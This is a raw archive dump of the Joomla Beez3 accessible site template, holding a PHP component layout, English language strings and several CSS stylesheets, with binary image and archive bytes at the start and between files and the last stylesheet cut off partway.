~��������O��y�J&g˹���>y�[v�Rg�w��l��o_��?��}�K~�?��+s�FZ��Tߩ�gb����8߸������O.��m���4�s��ן�X=x�XX^Z����q�^<>����ܟ��K-19`~�k���`��?4������s�{q�y���8�&��XPo�����Z*�םjo,U���d�|�Q�Ulg��*V��D�p����vwI�ۨ[}]��@���v�z
W�kDVE��b�z�a��0���6d;�j�����#xm��Ѱ�����&�Дy�@:Sh��
U�0̘ߩ5�A*�c�Q����io��S���9���&̭J*����FK7��T�U��rU1� b�f<%�rck�����vy뉤N*�m$)�t�mY��B���")�M5[��H&�M���O?}��Z�]��ጆ�S%�ע�ov��ӧ'''�Z�����@9����]�^��O�q�fs��43���,ܭ���f7�M
Q�T[-OV���Z6�SU�n���}���w=����}�^��:=��d*%a^���Ͷ�gME6̈��r5$Z\��
zݡ1����d��nd���g�zZK�g)��L:^�X
@LVH]ǣD�w�D���\��WVh@s�.(��jZ-+W�(r�@$�}/��;�a�Q�¾;si����5ɴ��h�I�k�{~@���EJ���A�F��wᑢЖ�IEND�B`�PK!���6��beez3/component.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

$color = $this->params->get('templatecolor');

// Output as HTML5
$this->setHtml5(true);

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));

// Add stylesheets
JHtml::_('stylesheet', 'templates/system/css/system.css', array('version' => 'auto'));
JHtml::_('stylesheet', 'template.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'position.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'layout.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'print.css', array('version' => 'auto', 'relative' => true), array('media' => 'print'));
JHtml::_('stylesheet', 'general.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', htmlspecialchars($color, ENT_COMPAT, 'UTF-8') . '.css', array('version' => 'auto', 'relative' => true));

if ($this->direction === 'rtl')
{
	JHtml::_('stylesheet', 'template_rtl.css', array('version' => 'auto', 'relative' => true));
	JHtml::_('stylesheet', htmlspecialchars($color, ENT_COMPAT, 'UTF-8') . '_rtl.css', array('version' => 'auto', 'relative' => true));
}

JHtml::_('stylesheet', 'ieonly.css', array('version' => 'auto', 'relative' => true, 'conditional' => 'lte IE 6'));

// Check for a custom CSS file
JHtml::_('stylesheet', 'user.css', array('version' => 'auto', 'relative' => true));
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<jdoc:include type="head" />
</head>
<body class="contentpane">
	<div id="all">
		<div id="main">
			<jdoc:include type="message" />
			<jdoc:include type="component" />
		</div>
	</div>
</body>
</html>
PK!S9�",beez3/language/en-GB/en-GB.tpl_beez3.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_BEEZ3_POSITION_DEBUG="Debug"
TPL_BEEZ3_POSITION_POSITION-0="Search"
TPL_BEEZ3_POSITION_POSITION-10="Footer middle"
TPL_BEEZ3_POSITION_POSITION-11="Footer bottom"
TPL_BEEZ3_POSITION_POSITION-12="Middle top"
TPL_BEEZ3_POSITION_POSITION-13="Unused"
TPL_BEEZ3_POSITION_POSITION-14="Footer last"
TPL_BEEZ3_POSITION_POSITION-15="Header"
TPL_BEEZ3_POSITION_POSITION-1="Top"
TPL_BEEZ3_POSITION_POSITION-2="Breadcrumbs"
TPL_BEEZ3_POSITION_POSITION-3="Right bottom"
TPL_BEEZ3_POSITION_POSITION-4="Left middle"
TPL_BEEZ3_POSITION_POSITION-5="Left bottom"
TPL_BEEZ3_POSITION_POSITION-6="Right top"
TPL_BEEZ3_POSITION_POSITION-7="Left top"
TPL_BEEZ3_POSITION_POSITION-8="Right middle"
TPL_BEEZ3_POSITION_POSITION-9="Footer top"
TPL_BEEZ3_XML_DESCRIPTION="Accessible site template for Joomla! 3.x. Beez3, the HTML5 version."

PK!�|����(beez3/language/en-GB/en-GB.tpl_beez3.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_BEEZ3_ADDITIONAL_INFORMATION="Additional information"
TPL_BEEZ3_ALTCLOSE="is closed"
TPL_BEEZ3_ALTOPEN="is open"
TPL_BEEZ3_BIGGER="Bigger"
TPL_BEEZ3_CLICK="select"
TPL_BEEZ3_CLOSEMENU="Close Menu"
TPL_BEEZ3_DECREASE_SIZE="Decrease size"
TPL_BEEZ3_ERROR_JUMP_TO_NAV="Jump to navigation"
TPL_BEEZ3_FIELD_BOOTSTRAP_DESC="Create a comma separated list of any components for which Bootstrap is needed, for example com_name, com_anothername."
TPL_BEEZ3_FIELD_BOOTSTRAP_LABEL="Components Requiring<br /> Bootstrap"
TPL_BEEZ3_FIELD_DESCRIPTION_DESC="Please add your site description here."
TPL_BEEZ3_FIELD_DESCRIPTION_LABEL="Site Description"
TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_DESC="Choose a colour for the Background when Custom is selected as the Template Colour. If left blank the Default (#eeeeee) is used."
TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_LABEL="Background Colour"
TPL_BEEZ3_FIELD_HEADER_IMAGE_DESC="Use the selected header image when Custom is selected as the Template Colour"
TPL_BEEZ3_FIELD_HEADER_IMAGE_LABEL="Header Image"
TPL_BEEZ3_FIELD_LOGO_DESC="Please choose an image. If you do not want to display a logo, select Clear and leave the field blank."
TPL_BEEZ3_FIELD_LOGO_LABEL="Logo"
TPL_BEEZ3_FIELD_NAVPOSITION_DESC="Navigation before or after content."
TPL_BEEZ3_FIELD_NAVPOSITION_LABEL="Position of Navigation"
TPL_BEEZ3_FIELD_SITETITLE_DESC="Please add your site title here, it's only displayed if you don't use a logo."
TPL_BEEZ3_FIELD_SITETITLE_LABEL="Site Title"
TPL_BEEZ3_FIELD_TEMPLATECOLOR_DESC="Colour of the template."
TPL_BEEZ3_FIELD_TEMPLATECOLOR_LABEL="Template colour"
TPL_BEEZ3_FIELD_WRAPPERLARGE_DESC="Wrapper width with closed additional columns in percent."
TPL_BEEZ3_FIELD_WRAPPERLARGE_LABEL="Wrapper Large (%)"
TPL_BEEZ3_FIELD_WRAPPERSMALL_DESC="Wrapper width with opened additional columns in percent."
TPL_BEEZ3_FIELD_WRAPPERSMALL_LABEL="Wrapper Small (%)"
TPL_BEEZ3_FONTSIZE="Font size"
TPL_BEEZ3_INCREASE_SIZE="Increase size"
TPL_BEEZ3_JUMP_TO_INFO="Jump to additional information"
TPL_BEEZ3_JUMP_TO_NAV="Jump to main navigation and login"
TPL_BEEZ3_NAVIGATION="Navigation"
TPL_BEEZ3_NAV_VIEW_SEARCH="Nav view search"
TPL_BEEZ3_NEXTTAB="Next Tab"
TPL_BEEZ3_OPENMENU="Open Menu"
TPL_BEEZ3_OPTION_AFTER_CONTENT="after content"
TPL_BEEZ3_OPTION_BEFORE_CONTENT="before content"
TPL_BEEZ3_OPTION_IMAGE="Custom"
TPL_BEEZ3_OPTION_NATURE="Nature"
TPL_BEEZ3_OPTION_PERSONAL="Personal"
TPL_BEEZ3_OPTION_RED="Red"
TPL_BEEZ3_OPTION_TURQ="Turquoise"
TPL_BEEZ3_POWERED_BY="Powered by"
TPL_BEEZ3_RESET="Reset"
TPL_BEEZ3_REVERT_STYLES_TO_DEFAULT="Revert styles to default"
TPL_BEEZ3_SEARCH="Search"
TPL_BEEZ3_SKIP_TO_CONTENT="Skip to content"
TPL_BEEZ3_SKIP_TO_ERROR_CONTENT="Jump to error message and search"
TPL_BEEZ3_SMALLER="Smaller"
TPL_BEEZ3_SYSTEM_MESSAGE="Error"
TPL_BEEZ3_TEXTRIGHTCLOSE="Close info"
TPL_BEEZ3_TEXTRIGHTOPEN="Open info"
TPL_BEEZ3_XML_DESCRIPTION="Accessible site template for Joomla! 3.x. Beez3, the HTML5 version."
TPL_BEEZ3_YOUR_SITE_DESCRIPTION="Your site description"
PK!B�5�88beez3/css/position.cssnu&1i�/**

 * @author ( Angie Radtke )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */

html,
body,
body div,
span,
object,
iframe,
h1,
h2,
h3,
h4,
h5,
h6,
p,
blockquote,
pre,
abbr,
address,
cite,
code,
del,
dfn,
em,
img,
ins,
kbd,
q,
samp,
small,
strong,
sub,
sup,
var,
b,
i,
dl,
dt,
dd,
ol,
ul,
li,
fieldset,
form,
label,
legend,
table,
caption,
tbody,
tfoot,
thead,
tr,
th,
td,
article,
aside,
figure,
footer,
header,
hgroup,
menu,
nav,
section,
time,
mark,
audio,
video {
    margin: 0;
    padding: 0;
    border: 0;
    outline: 0;
    vertical-align: baseline;
    background: transparent;
}

article,
aside,
figure,
footer,
header,
hgroup,
nav,
section {
    display: block;
}

html {
    background: #ffffff;
    font-size: 100.01%;
    -webkit-overflow-scrolling: touch;
    -webkit-tap-highlight-color: #f3f5f6;
    -webkit-text-size-adjust: 100%;
    -ms-text-size-adjust: 100%;
}

body {

    position: relative;
    width: 100%;
    line-height: 1.5em;
    background: #eee
}

/* ###################### general ###################### */
#all {
    margin: 0 auto;
    max-width: 1050px;
    padding: 0;
    text-align: left;
    font-size: 0.8em
}

#header {
    display: block !important;
    position: relative;
    padding: 8em 0 0 0;
    overflow: hidden;
}

#header ul {
    position: absolute;
    left: 0;
    top: 5em;
    right: 0;
    display: block;
    margin: 0 0 1px 0;
    text-align: right;
    list-style-type: none;
    padding: 10px 0
}

#back {
    margin: 0;
    padding: 0;
}

#contentarea,
#contentarea2 {
    position: relative;
    overflow: hidden;
    padding: 0 20px !important;
    margin: 0;

}

#wrapper {
    width: 53%;
    float: left;
    position: relative;

}

#wrapper2 {
    width: 72%;
    float: left;
    position: relative;
    padding-bottom: 20px;

}

#wrapper2 .item-page {
    max-width: 660px
}

#main {
    padding-top: 10px;
    padding-bottom: 20px;
    position: relative;

}

#right {
    float: left;
    width: 20%;
    margin: 10px 0 10px 2%;
    padding: 0 0 5px 0;
    position: relative;
}

.unseen,
.hidelabeltxt,
#line label {
    display: inline;
    height: 0;
    left: -3000px;
    position: absolute;
    top: -2000px;
    width: 0;
}

/* ++++++++++++++  nav after content  ++++++++++++++ */
.left {
    padding-top: 0;
    float: right;
    margin: 10px 0 10px 0;
    width: 22%;
    position: relative;

}

/* ++++++++++++++  nav before content  ++++++++++++++ */
.left1 {
    padding: 0;
    float: left;
    margin: 10px 3% 10px 0;
    width: 21%;
    position: relative
}

.leftbigger {
    width: 25%
}

/* ###################### header ###################### */

.skiplinks,
.skiplinks li {
    display: inline;
    height: 0;
    line-height: 0;
    padding: 0 !important;
}

.skiplinks li a.u2 {
    display: inline;
    height: 0;
    left: -3000px;
    position: absolute;
    top: -2000px;
    width: 0;

}

.skiplinks li a.u2:active,
.skiplinks li a.u2:focus {
    position: absolute;
    width: 13em;
    top: -4em;
    left: 10px;
    line-height: 1.5em;
    padding: 5px;
    font-weight: bold;
    height: 3em;

}

.wrap {
    border: 0;
    clear: both;
    float: none;
    font-size: 1px;
    height: 0;
    line-height: 1px;
    margin: 0;
    padding: 0;
    visibility: hidden;
}

#logo {
    margin-top: 0;
    margin-left: 10px;
    display: block;
    padding: 1em 20px 20px 10px;
    width: 425px;
    font-weight: normal;
    line-height: 1em;

}

#logo img {
    display: block;
}

#logo span {
    padding-left: 2px
}

#logo span.header1 {
    display: block;
    top: 0;
    line-height: 0.8em;
    font-size: 0.7em;
    padding-left: 55px
}

.logoheader {
    margin: -2px 10px 0;
    padding: 0;
    text-align: left;
    font-weight: normal;
    line-height: 1.5em;
}
.header1 {
	font-size: 1.5em;
	margin-left: 10px;
}

#line {
    padding: 5px 0 2px 2px;
    position: absolute;
    right: 10px;
    top: 0.5em;
    max-width: 40em;
    text-align: right;
    min-width: 40em

}

#fontsize,
#line .search {
    display: inline;
    margin: 0;
}

/* ++++++++++++++  button for closing right column  ++++++++++++++ */

#close {
    margin-right: 0;
    text-transform: uppercase;
}

#close span {
    position: absolute;
    right: 20px;
    z-index: 10000;
    top: 5px;
    font-weight: bold;
    text-align: right;
    line-height: 1.5em;
    margin-top:20px;
    padding: 5px
}

#close > a {
    display: block;
    overflow: hidden
}

#close > a:hover span {
    background: #095197
}

/* ###################### main ###################### */

/* ++++++++++++++  position  ++++++++++++++ */

.blog-featured {
    padding: 0;
}

.items-leading {
    padding: 0 5px 10px 5px;
    overflow: hidden;
    margin-bottom: 10px
}

.row-separator {
    display: block;
    clear: both;
    margin: 0;
    border: 0;
    height: 1px
}

.item-separator {
    display: none;
    margin: 0;
}

.shownocolumns {
    width: 98% !important;
}

#top {
    margin: 0 0 20px 0;
    overflow: hidden
}

/* ++++++++++++++  blog  ++++++++++++++ */

.cols-1 {
    display: block;
    float: none !important;
    margin: 0 !important;
}

.cols-2 .column-1 {
    width: 46%;
    float: left;
}

.cols-2 .column-2 {
    width: 46%;
    float: right;
    margin: 0
}

.cols-3 .column-1 {
    float: left;
    width: 29%;
    padding: 0 5px;
    margin-right: 4%

}

.cols-3 .column-2 {
    float: left;
    width: 29%;
    margin-left: 0;
    padding: 0 5px
}

.cols-3 .column-3 {
    float: right;
    width: 29%;
    padding: 0 5px
}

.items-row {
    overflow: hidden;
    margin-bottom: 10px !important;
}

.column-1,
.column-2,
.column-3 {
    padding: 10px 5px
}

.column-2 {
    width: 55%;
    margin-left: 40%;
}

.column-3 {
    width: 30%
}

.blog-more {
    padding: 10px 5px
}

/* ++++++++++++++  footer  ++++++++++++++ */

#bottom {
    overflow: hidden
}

.box {
    width: 27%;
    float: left;
    margin-right: 10px;
    min-height: 100px
}

.box1 {
    width: 35%
}

.box2 {
    width: 32%
}

.box3 {
    float: right
}

#footer-inner, #footer {
    max-width: 1025px;
    margin: 0 auto;

    padding: 10px 15px 10px 10px;
}

img {
    border: 0 none;
    max-width: 100%;
}

/* hide the mobile menu button */
#mobile_select {
    display: none
}
PK!�ן77beez3/css/print.cssnu&1i�/**
 * @author Design & Accessible Team ( Angie Radtke / Robert Deutz )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */


/* not ready */

h1,
#main h1
{
      font-size: 16pt;
      font-weight: bold;
      margin: 0.4em 0 0.5em 0;
      padding:0;
}

h2,
#main h2
{
      font-size: 14pt;
      font-weight: bold;
      margin: 0.2em 0 0.5em 0;
      padding: 0.3em 0.3em 0.3em 0;
}

h3
{
      font-size: 12pt;
      font-weight: bold;
      margin: 0.4em 0 0.2em 0;
}

/* Vermeidung von Seitenumbr�chen direkt nach einer �berschrift */
h1,
h2,
h3
{
      page-break-after: avoid;
}

body
{
  line-height:150%;
  font-family:Arial, Verdana, Helvetica, sans-serif;
}

p,
ul li, ol li,
address,
.category-desc,
table,
label,
dt,
dd
{
  font-size:10pt
}

address
{
	font-style:normal
}

.contact-address address span
{
	display:block
}

a
{
      font-weight: bold;
}

.unseen,
#line,
#header ul,
#breadcrumbs,
.article-info-term,
ul.actions,
#close,
.display-limit,
.moduletable_menu,
.moduletable_js,
.tabouter,
#bottom,
.pagination,
#footer,
#header-image

{
      display: none;
}

.skiplinks,
#suckerfish
{
	display:none !important
}

#header .logoheader
{
	border:0;
}

#header
{
      width: auto;
}

#all #back #header
{
padding-top:0
}


#all
{
      text-align:left;
      border:solid 0px #000
}

#back
{
  border:solid 0px #000;
  padding:0
}

#right
{
      display: block;
}

#header h1#logo
{
  font-size:20pt;
  font-weight:normal
}

#contentarea2,
#contentarea
{
	border: solid 0px #000;
	padding:0 !important
}

#main .blog-featured h1
{
  padding:0 !important;
}

#main #top
{
  overflow:hidden;
  margin-bottom:25pt;
  border:0
}

#main .categories-listalphabet ul
{
	padding-left:0
}

#main .categories-listalphabet ul li
{
	display:inline;
	padding:5pt;
	border-right:solid 1pt #ddd
}

#wrapper
{
	display:block;
	width:100% !important;
}

.item
{
  margin-bottom:30pt
}

.category-desc
{
	margin:15pt 0
}

.items-leading
{
	margin-bottom:30pt
}

#main .items-leading h2,
#main .item h2
{
      font-size: 14pt;
      font-weight: bold;
}

h2 a
{
	text-decoration:none
}

#main h1
{
	padding:5pt
}

#main .readmore a
{
  border:0 !important;
  padding-left:0 !important
}

.image-left {
	float:left;
	margin:0 15pt 5pt 0;
}

table
{
  margin:20pt 0;
  border-collapse:collapse;
  width:90%;
}

table td,
table th
{
  padding:2pt 5pt;
  border:solid 1pt #ddd
}

.items-more h3
{
	padding: 5pt 0;
	font-size:14pt
}

.items-more ol li a
{
	font-weight:normal
}

#nav a.readmore
{
  font-size:10pt
}

#nav .module_content
{
  margin-bottom:20pt;
  border:0 !important;
  padding:0 !important
}

#nav .moduletable ul.menu
{
	border:0;
	list-style-type:none;
	padding:0
}

#nav .moduletable ul.menu,
#nav .moduletable ul.menu ul,
#nav .moduletable ul.menu ul ul
{
	border:0;
	list-style-type:none
}

#nav .moduletable ul.menu ul,
#nav .moduletable ul.menu ul ul
{
	padding-left:15pt
}

#nav .moduletable ul.menu li
{
  border:0
}

#nav .moduletable ul.menu li a,
#nav .moduletable ul.menu li.active ul li a,
#nav .moduletable ul.menu li.active ul li.active ul li a
{
	text-decoration:none;
	border:solid 0px #000
}

ul#archive-items
{
	list-style-type:none;
	padding-left:0
}

.moduletable
{
  margin:20pt 0
}

dl.article-info
{
	line-height:120%;
	font-size:9pt
}

dl.article-info dd
{
	margin-left:0
}

h3.js_heading a img
{
  border:0
}

h3.js_heading,
#bottom h3,
.moduletable h3,
#nav h3
{
  font-size:12pt !important;
}

.category-list
{
	padding:0 !important;
}

.moduletable_js
{
  margin-bottom:20pt
}

.tabouter
{
  border:solid 0px ;
  overflow:hidden;
  margin:20pt 0
}

ul.tabs
{
  padding:0;
}

ul.tabs li.tab
{
  list-style-type:none;
  text-transform:uppercase;
  display:inline;
  border-right:solid 1pt #ddd;
  padding:2pt 10pt
}

ul.tabs li.tab a
{
  text-decoration:none;
}

.tabcontent
{
  padding:10pt
}

.contact-email div
{
	overflow:hidden
}

.contact-email label
{
	border:solid 0px #000;
	float:left;
	width:10em
}

.login div
{
	overflow:hidden
}

.login label
{
	float:left;
	width:10em
}

form fieldset dt
{
	clear:left;
	float:left;
	width:12em;
}

legend
{
	background:#fff;
	font-size:.85em
}

.phrases,
.only
{
	margin-bottom:15pt
}

.newsflash a.readmore:link
{
	border: solid 0pt ;
	font-weight:normal;
	font-size:0.8em;
	text-decoration:none
}

.stats dt
{
	float:left;
	width:10em
}

#footer-outer
{
  border:solid 0px;
  padding:0;
  background:none
}

#bottom
{
  text-align:left
}

#footer-outer #bottom .box .moduletable
{
  border-bottom:solid 1px #ddd;
  padding:10pt 0
}

#footer-outer #bottom .box1,
#footer-outer #bottom .box3
{
  border:0;
}

#bottom ul
{
  list-style-type:none;
  padding:0 !important
}

#bottom ul li
{
  border:solid 0px #c00
}
PK!=^G���beez3/css/ie7only.cssnu&1i�/**
 * @author  ( Angie Radtke  )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
 */



div.current , fieldset {zoom:1}
dl.tabs ,.tabs dt,.tabs dd
{display:inline}
.contact-links , .js_heading{zoom:1}

legend {margin-left:-7px}

#users-profile-core legend,
#users-profile-custom legend,
.profile-edit legend,
.registration legend
{margin-bottom:15px}

.login-fields input
{width:14em}

#close a
{
	cursor:pointer
}

#close a span
{
	line-height:normal
}
PK!E��RHRHbeez3/css/layout.cssnu&1i�/**
 * @author  ( Angie Radtke  )
 * @package Joomla
 * @subpackage Accessible-Template-Beez
 * @copyright Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
 * @license GNU/GPL, see LICENSE.txt
 * Joomla! is free software. This version may have been modified pursuant to the
 * GNU General Public License, and as distributed it includes or is derivative
 * of works licensed under the GNU General Public License or other free or open
 * source software licenses. See COPYRIGHT.php for copyright notices and
 * details.
	/* Typography =================================================== */
body#shadow {
	font-family: arial,sans-serif
}

body h1,body h2,body h3,body h4,body h5,body h6 {
	margin: 0;
	font-family: inherit;
	font-weight: normal;
	color: inherit;
	text-rendering: optimizelegibility;
	word-wrap: break-word;
}

body h1 {
	margin-bottom: 0.75em;
	font-size: 3.6em;
	line-height: 1.2;
}

body h2 {
	margin-bottom: 0.75em;
	font-size: 1.5em;
	line-height: 1.2;
	padding: 5px 0
}

body h3 {
	margin-bottom: 1em;
	font-size: 1.4em;
	line-height: 1.3;
	padding-bottom: 5px
}

body h4 {
	margin-bottom: 1.5em;
	font-size: 1.2em;
	line-height: 1.25;
}

body h5 {
	font-size: 1.1em;
	margin-bottom: 1.5em;
}

body p,body ol,body ul,body dl,body address {
	margin-bottom: 1.5em;
	font-size: 1.0em;
	line-height: 1.5em;
	word-wrap: break-word;
}

small {
	font-size: 0.9em;
}

body ul,body ol {
	margin: 0 0 1.5em 12px;
	padding: 0 0 0 12px;
}

body li ul,body li ol {
	margin: 0;
}


ul.categories-module
{ padding:0; margin:0}


blockquote {
	margin: 0 0 1.5em -24px;
	padding-left: 24px;
	border-left: 2px solid #c7ced6;
	font-style: normal;
}

q {
	quotes: none;
}



cite {
	font-style: normal;
}

abbr[title] {
	border-bottom: 1px dotted #c7ced6;
	cursor: help;
}

b,strong {
	font-weight: bold;
}

dfn {
	font-style: italic;
}

ins {
	text-decoration: none;
}

mark {
	font-style: italic;
	font-weight: bold;
}

pre,code,kbd,samp {
	line-height: 1.5em;
}

pre {
	white-space: pre-wrap;
	}

sub,sup {
	position: relative;
	line-height: 0;
}

sup {
	top: -0.5em;
}

sub {
	bottom: -0.25em;
}

table {
	width: 100%;
	max-width: 100%;
	margin-bottom: 1.5em;
	border-collapse: collapse;
	border-spacing: 0;
	background-color: transparent;
	font-size: 1em
}

table th,table td {
	padding: 8px;
	vertical-align: top;
	border-top: 1px solid #ddd;
	line-height: 1.5em;
	text-align: left;
}

table th {
	font-weight: bold;
	border: 0
}

table thead th {
	vertical-align: bottom;
}

table  tr:first-child th,table tr:first-child td,table thead:first-child tr:first-child th,table thead:first-child tr:first-child td
	{
	border-top: 0;
}

table tbody+tbody {
	border-top: 2px solid #8c9bab;
}

table tbody tr td,table tbody tr th {
	-webkit-transition: background-color 0.25s 0 linear;
	-moz-transition: background-color 0.25s 0 linear;
	-ms-transition: background-color 0.25s 0 linear;
	-o-transition: background-color 0.25s 0 linear;
	transition: background-color 0.25s 0 linear;
}

/* links */
p.readmore a,  .mod-articles-category-readmore a {
	border: 1px solid #CCCCCC;
	border-radius: 3px;
	display: inline-block;
	text-decoration: none;
	margin-bottom: 9px;
	padding: 4px;
	line-height: 1.6em;
}

/* +++++++++++++++++  forms general #######################  */
form {
	margin: 0 0 18px;
}

fieldset {
	border: solid 1px #ddd;
	margin: 10px 0;
	padding: 20px;
	border-radius: 5px
}

fieldset p {
	margin: 0;
	padding: 0;
}

legend {
	font-weight: bold;
	background: #fff;
	padding: 5px 10px
}

label,input,button,select,textarea {
	font-weight: normal;
}

label {
	color: #333333;
	margin-bottom: 5px;
	max-width: 90%
}

input,textarea,select,#advanced-search-toggle, input.search-query {
	border: 1px solid #CCCCCC;
	border-radius: 3px;
	display: inline-block;
	margin-bottom: 9px;
	padding: 4px;
}
.filter-search-lbl {display:inline}
.filter-search, .display-limit {float:left; margin-right:10px}
.button,button,.profile-edit a {
	border-radius: 3px;
	padding: 4px;
	line-height: 1.2em;
	text-decoration: none;
}

label input,label textarea,label select {
	display: block;
}

input[type="image"],input[type="checkbox"],input[type="radio"] {
	border-radius: 0;
	cursor: pointer;
	height: auto;
	line-height: normal;
	margin: 3px 0;
	padding: 0;
	width: auto;
}

input[type="button"],input[type="reset"],input[type="submit"] {
	height: auto;
	width: auto;
}

select {
	height: 28px;
	line-height: 28px;
	max-width:99%}

select {
	width: 220px;
}

select[multiple],select[size] {
	height: auto;
}

textarea {
	height: auto;
}

.radio,.checkbox {
	padding-left: 18px;
}

input[type="radio"],input[type="checkbox"] {
	display: inline;
	 margin-right : 10px;
	 border:none
}

input,textarea {
	-moz-transition: border 0.2s linear 0s, box-shadow 0.2s linear 0s;
	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset;
}

input:focus,textarea:focus {
	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset, 0 0 8px
		rgba(82, 168, 236, 0.6);
	outline: 0 none;
}

input[type="file"]:focus,input[type="radio"]:focus,input[type="checkbox"]:focus,select:focus
	{
	box-shadow: none;
	outline-offset: -2px;
}

/* +++++++++++++++++++++++  header searchbox +++++++++++++++++++++  */

#header form {
	overflow: hidden;
	float: right
}
#header form .search {display:inline}
#header input {
	font-weight: bold;
	float: left;
}

#header .inputbox {
	margin-right: 5px
}

/* ++++++++++++++++++++  search component +++++++++++++++++++++++ */

fieldset.word {
	border: 0;
	background: #fff;
	padding: 0
}

fieldset.phrases label,fieldset.only label {
	display: inline;
}

 :root *> fieldset.only label:before {
	background: #a7c7dc;
	background: -moz-linear-gradient(-45deg, #fefefe, #ddd);
	background: -webkit-linear-gradient(-45deg, #fefefe, #ddd);
	background: -o-linear-gradient(-45deg, #fefefe, #ddd);
	background: -ms-linear-gradient(-45deg, #fefefe, #ddd);
	background: linear-gradient(-45deg, #fefefe, #ddd);
	border: 1px solid #aaa;
	border-radius: 3px;
	box-shadow: 0 0 1px 1px #CCCCCC;
	height: 1em;
	margin: 0 4px 0 0;
	text-transform: uppercase;
	width: 1em;
	display: inline-block;
	margin-left: -40px;
	padding: 2px;
	line-height: 1em;
	text-indent: -50px;
}

input[type="checkbox"]:checked+label:before {
	content: "\2714";
	text-indent: 0;
	background: -moz-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -webkit-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -o-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -ms-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: linear-gradient(-45deg, #fefefe, #0b70cd);
	border: 1px solid #0B70CD;
}

:root *> .phrases-box  label:before {
	background: #a7c7dc;
	background: -moz-linear-gradient(-45deg, #fefefe, #ccc);
	background: -webkit-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -o-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -ms-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: linear-gradient(-45deg, #fefefe, #0b70cd);
	border: 1px solid #aaa;
	line-height: 1.3em;
	margin: 0 4px 0 0;
	text-transform: uppercase;
	width: 1.3em;
	display: inline-block;
	margin-left: -40px;
	-moz-border-radius: 12px;
	-webkit-border-radius: 12px;
	border-radius: 12px;
	text-indent: -40px;
	color: #fff;
	text-shadow: 0 10px 6px #fff;
}

/*
input[type="radio"]:checked + label:before {
	content: "\2022";
	text-indent: 6px;
	background: -moz-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -webkit-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -o-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: -ms-linear-gradient(-45deg, #fefefe, #0b70cd);
	background: linear-gradient(-45deg, #fefefe, #0b70cd);
	color: #000;
	zoom:1;
	border: 1px solid #aaa;
}*/

.ordering-box {
	margin: 10px 0;
}

.search-results dt.result-title {
	padding: 15px 15px 0 5px;
	font-weight: bold;
}

.search-results dd {
	padding: 2px 15px 2px 5px
}

.search-results dd.result-text {
	padding: 10px 15px 10px 5px;
	line-height: 1.7em
}

.search-results dd.result-url {
	font-size: 90%;
	padding: 2px 15px 15px 5px;
}

.search-results dd.result-created {
	padding: 2px 15px 15px 5px
}

.search-results dd.result-category {
	padding: 10px 15px 5px 5px
}

/* Com_search break long titles & text */
dt.result-title {
	word-wrap: break-word;
}

dd.result-text {
	word-wrap: break-word;
}

.advanced-search-tip {
	background: #FEFDE2;
	border-radius: 3px;
	padding: 20px;
	border: solid 1px #ddd
}

.advanced-search-tip p {
	margin: 0
}

.advanced-search-tip .term {
	font-weight: bold;
	font-style: italic
}

.panel {
	border: solid 1px #ddd;
	margin-top: -1px;
}

#main  .panel h3 {
	margin: 0;
	padding: 0;
	background: #eee;
	border: 0;
	font-size: 1.0em
}

.panel h3 a {
	display: block;
	text-decoration: none;
	padding: 6px;
}

.pane-slider {
	border: solid 0;
	padding: 10px;
	margin: 0;
}


/* +++++++++++++++++++  Contact Form +++++++++++++++++++++++++++++++++ */


.panel .contact-form,.panel .contact-miscinfo {
	padding: 10px
}

.contact .panel .contact-form form,.contact .panel .contact-address {
	margin: 20px 0 0 0
